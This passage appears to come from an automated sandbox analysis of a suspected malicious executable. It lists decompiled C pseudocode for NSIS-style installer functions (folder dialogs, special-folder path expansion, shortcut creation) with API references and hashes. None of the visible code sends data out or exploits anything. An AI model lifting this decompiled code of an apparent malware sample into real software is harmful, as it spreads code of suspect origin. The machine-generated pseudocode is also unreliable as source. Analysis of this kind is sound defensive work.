					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                                            0x0040435c
                                                                                                            0x00404363
                                                                                                            0x0040436f
                                                                                                            0x0040437d
                                                                                                            0x00404385
                                                                                                            0x00404389
                                                                                                            0x0040438f
                                                                                                            0x0040438f
                                                                                                            0x0040439b
                                                                                                            0x0040440f
                                                                                                            0x00404416
                                                                                                            0x004044eb
                                                                                                            0x004044f2
                                                                                                            0x00404501
                                                                                                            0x00404501
                                                                                                            0x00404505
                                                                                                            0x0040450b
                                                                                                            0x00404518
                                                                                                            0x0040451a
                                                                                                            0x0040451a
                                                                                                            0x00404528
                                                                                                            0x0040452d
                                                                                                            0x00404530
                                                                                                            0x00404537
                                                                                                            0x0040453a
                                                                                                            0x00404571
                                                                                                            0x00404573
                                                                                                            0x00404579
                                                                                                            0x00404580
                                                                                                            0x00404582
                                                                                                            0x00404582
                                                                                                            0x0040459e
                                                                                                            0x004045da
                                                                                                            0x00000000
                                                                                                            0x004045a0
                                                                                                            0x004045a3
                                                                                                            0x004045b7
                                                                                                            0x004045b9
                                                                                                            0x00000000
                                                                                                            0x004045b9
                                                                                                            0x0040453c
                                                                                                            0x00404540
                                                                                                            0x0040456f
                                                                                                            0x0040456f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404542
                                                                                                            0x00404542
                                                                                                            0x0040454f
                                                                                                            0x00404554
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404558
                                                                                                            0x0040455a
                                                                                                            0x0040455a
                                                                                                            0x00404565
                                                                                                            0x00404568
                                                                                                            0x0040456d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040456d
                                                                                                            0x004045c8
                                                                                                            0x004045cf
                                                                                                            0x004045d6
                                                                                                            0x004045dd
                                                                                                            0x004045dd
                                                                                                            0x004045e2
                                                                                                            0x004045e4
                                                                                                            0x004045ec
                                                                                                            0x004045f2
                                                                                                            0x004045f2
                                                                                                            0x00404602
                                                                                                            0x0040460c
                                                                                                            0x00404614
                                                                                                            0x0040462a
                                                                                                            0x00404616
                                                                                                            0x0040461a
                                                                                                            0x0040461a
                                                                                                            0x00404614
                                                                                                            0x0040462f
                                                                                                            0x00404634
                                                                                                            0x00404639
                                                                                                            0x00404642
                                                                                                            0x00404642
                                                                                                            0x0040464b
                                                                                                            0x0040464d
                                                                                                            0x0040464d
                                                                                                            0x00404659
                                                                                                            0x00404661
                                                                                                            0x0040466b
                                                                                                            0x0040466b
                                                                                                            0x00404670
                                                                                                            0x00000000
                                                                                                            0x00404670
                                                                                                            0x0040453a
                                                                                                            0x004044f4
                                                                                                            0x004044fb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004044fb
                                                                                                            0x0040441c
                                                                                                            0x00404422
                                                                                                            0x0040443c
                                                                                                            0x00404441
                                                                                                            0x0040444b
                                                                                                            0x00404452
                                                                                                            0x00404461
                                                                                                            0x00404464
                                                                                                            0x00404467
                                                                                                            0x0040446e
                                                                                                            0x00404476
                                                                                                            0x00404479
                                                                                                            0x0040447d
                                                                                                            0x00404484
                                                                                                            0x0040448c
                                                                                                            0x004044e4
                                                                                                            0x0040448e
                                                                                                            0x0040448f
                                                                                                            0x00404496
                                                                                                            0x004044a0
                                                                                                            0x004044a8
                                                                                                            0x004044b5
                                                                                                            0x004044c9
                                                                                                            0x004044cd
                                                                                                            0x004044cd
                                                                                                            0x004044c9
                                                                                                            0x004044d2
                                                                                                            0x004044dd
                                                                                                            0x004044dd
                                                                                                            0x0040448c
                                                                                                            0x00000000
                                                                                                            0x00404441
                                                                                                            0x0040442f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00404435
                                                                                                            0x00000000
                                                                                                            0x0040439d
                                                                                                            0x0040439d
                                                                                                            0x004043a9
                                                                                                            0x004043b3
                                                                                                            0x004043c0
                                                                                                            0x004043c0
                                                                                                            0x004043c6
                                                                                                            0x004043cf
                                                                                                            0x004043d8
                                                                                                            0x004043db
                                                                                                            0x004043de
                                                                                                            0x004043e6
                                                                                                            0x004043e9
                                                                                                            0x004043ec
                                                                                                            0x004043f4
                                                                                                            0x004043fb
                                                                                                            0x00404402
                                                                                                            0x00404676
                                                                                                            0x00404688
                                                                                                            0x00404688
                                                                                                            0x0040440d
                                                                                                            0x00000000
                                                                                                            0x0040440d

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004043A2
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                            • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040448F
                                                                                                            • lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
                                                                                                            • lstrcatA.KERNEL32(?,Call), ref: 004044CD
                                                                                                            • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                              • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                              • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                              • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                              • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                              • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                            • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                            • API String ID: 2246997448-1655598669
                                                                                                            • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                            • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                            • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                            • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                                            0x00405b88
                                                                                                            0x00405b88
                                                                                                            0x00405b88
                                                                                                            0x00405b8e
                                                                                                            0x00405b93
                                                                                                            0x00405ba4
                                                                                                            0x00405ba4
                                                                                                            0x00405baf
                                                                                                            0x00405bb1
                                                                                                            0x00405bb6
                                                                                                            0x00405bb9
                                                                                                            0x00405bba
                                                                                                            0x00405bc1
                                                                                                            0x00405bc3
                                                                                                            0x00405bc9
                                                                                                            0x00405bcc
                                                                                                            0x00405bcc
                                                                                                            0x00405da5
                                                                                                            0x00405da5
                                                                                                            0x00405da9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405bd9
                                                                                                            0x00405bdf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405be5
                                                                                                            0x00405be6
                                                                                                            0x00405be9
                                                                                                            0x00405bec
                                                                                                            0x00405d98
                                                                                                            0x00405da2
                                                                                                            0x00405da4
                                                                                                            0x00405da4
                                                                                                            0x00405d9a
                                                                                                            0x00405d9c
                                                                                                            0x00405d9e
                                                                                                            0x00405d9f
                                                                                                            0x00405d9f
                                                                                                            0x00000000
                                                                                                            0x00405d98
                                                                                                            0x00405bf2
                                                                                                            0x00405bf6
                                                                                                            0x00405c06
                                                                                                            0x00405c0a
                                                                                                            0x00405c11
                                                                                                            0x00405c14
                                                                                                            0x00405c18
                                                                                                            0x00405c1e
                                                                                                            0x00405c21
                                                                                                            0x00405c24
                                                                                                            0x00405c27
                                                                                                            0x00405d42
                                                                                                            0x00405d45
                                                                                                            0x00405d75
                                                                                                            0x00405d78
                                                                                                            0x00405d7d
                                                                                                            0x00405d81
                                                                                                            0x00405d81
                                                                                                            0x00405d86
                                                                                                            0x00405d87
                                                                                                            0x00405d8c
                                                                                                            0x00405d8f
                                                                                                            0x00405d91
                                                                                                            0x00000000
                                                                                                            0x00405d91
                                                                                                            0x00405d47
                                                                                                            0x00405d4a
                                                                                                            0x00405d5f
                                                                                                            0x00405d66
                                                                                                            0x00405d4c
                                                                                                            0x00405d53
                                                                                                            0x00405d53
                                                                                                            0x00405d6e
                                                                                                            0x00405d71
                                                                                                            0x00405d3a
                                                                                                            0x00405d3b
                                                                                                            0x00405d3b
                                                                                                            0x00000000
                                                                                                            0x00405d71
                                                                                                            0x00405c2f
                                                                                                            0x00405c30
                                                                                                            0x00405c36
                                                                                                            0x00405c38
                                                                                                            0x00405c52
                                                                                                            0x00405c52
                                                                                                            0x00405c59
                                                                                                            0x00405c59
                                                                                                            0x00405c60
                                                                                                            0x00405c64
                                                                                                            0x00405c64
                                                                                                            0x00405c65
                                                                                                            0x00405c67
                                                                                                            0x00405ca0
                                                                                                            0x00405ca3
                                                                                                            0x00405cb3
                                                                                                            0x00405cb6
                                                                                                            0x00405cbe
                                                                                                            0x00405cc4
                                                                                                            0x00405cc4
                                                                                                            0x00405d20
                                                                                                            0x00405d20
                                                                                                            0x00405d22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405cc8
                                                                                                            0x00405ccf
                                                                                                            0x00405cd0
                                                                                                            0x00405cd2
                                                                                                            0x00405cec
                                                                                                            0x00405cfa
                                                                                                            0x00405d00
                                                                                                            0x00405d02
                                                                                                            0x00405d1d
                                                                                                            0x00405d1d
                                                                                                            0x00405d1d
                                                                                                            0x00000000
                                                                                                            0x00405d1d
                                                                                                            0x00405d08
                                                                                                            0x00405d13
                                                                                                            0x00405d19
                                                                                                            0x00405d1b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405d1b
                                                                                                            0x00405cd4
                                                                                                            0x00405cd7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ce6
                                                                                                            0x00405ce8
                                                                                                            0x00405cea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405cea
                                                                                                            0x00000000
                                                                                                            0x00405d20
                                                                                                            0x00405cab
                                                                                                            0x00000000
                                                                                                            0x00405c69
                                                                                                            0x00405c6e
                                                                                                            0x00405c84
                                                                                                            0x00405c89
                                                                                                            0x00405c8c
                                                                                                            0x00405d29
                                                                                                            0x00405d29
                                                                                                            0x00405d2d
                                                                                                            0x00405d35
                                                                                                            0x00405d35
                                                                                                            0x00000000
                                                                                                            0x00405d2d
                                                                                                            0x00405c96
                                                                                                            0x00405d24
                                                                                                            0x00405d24
                                                                                                            0x00405d27
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405d27
                                                                                                            0x00405c67
                                                                                                            0x00405c3a
                                                                                                            0x00405c3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405c40
                                                                                                            0x00405c44
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405c46
                                                                                                            0x00405c4a
                                                                                                            0x00000000
                                                                                                            0x00405c4c
                                                                                                            0x00405c4c
                                                                                                            0x00000000
                                                                                                            0x00405c4c
                                                                                                            0x00405c4a
                                                                                                            0x00405daf
                                                                                                            0x00405db9
                                                                                                            0x00405dc5
                                                                                                            0x00405dc5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                            • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                            • lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-1230650788
                                                                                                            • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                            • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                            • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                            • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                            0x00402029
                                                                                                            0x00402033
                                                                                                            0x0040203c
                                                                                                            0x00402046
                                                                                                            0x0040204f
                                                                                                            0x00402059
                                                                                                            0x0040205d
                                                                                                            0x0040205d
                                                                                                            0x00402062
                                                                                                            0x00402073
                                                                                                            0x0040207b
                                                                                                            0x0040215b
                                                                                                            0x0040215b
                                                                                                            0x00402162
                                                                                                            0x00402081
                                                                                                            0x00402081
                                                                                                            0x00402092
                                                                                                            0x00402096
                                                                                                            0x0040209c
                                                                                                            0x004020a6
                                                                                                            0x004020a8
                                                                                                            0x004020b3
                                                                                                            0x004020b6
                                                                                                            0x004020c3
                                                                                                            0x004020c5
                                                                                                            0x004020c7
                                                                                                            0x004020ce
                                                                                                            0x004020d1
                                                                                                            0x004020d1
                                                                                                            0x004020d4
                                                                                                            0x004020de
                                                                                                            0x004020e6
                                                                                                            0x004020eb
                                                                                                            0x004020f7
                                                                                                            0x004020f7
                                                                                                            0x004020fa
                                                                                                            0x00402103
                                                                                                            0x00402106
                                                                                                            0x0040210f
                                                                                                            0x00402114
                                                                                                            0x00402126
                                                                                                            0x00402135
                                                                                                            0x00402137
                                                                                                            0x00402143
                                                                                                            0x00402143
                                                                                                            0x00402135
                                                                                                            0x00402145
                                                                                                            0x0040214b
                                                                                                            0x0040214b
                                                                                                            0x0040214e
                                                                                                            0x00402154
                                                                                                            0x00402159
                                                                                                            0x0040216e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402159
                                                                                                            0x00402164
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                            • API String ID: 123533781-1104044542
                                                                                                            • Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                            • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                            • Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                            • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 39%
                                                                                                            			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                            0x00402656
                                                                                                            0x0040266a
                                                                                                            0x00402675
                                                                                                            0x00402676
                                                                                                            0x004027b1
                                                                                                            0x00402658
                                                                                                            0x00402658
                                                                                                            0x0040265a
                                                                                                            0x0040265c
                                                                                                            0x0040265c
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
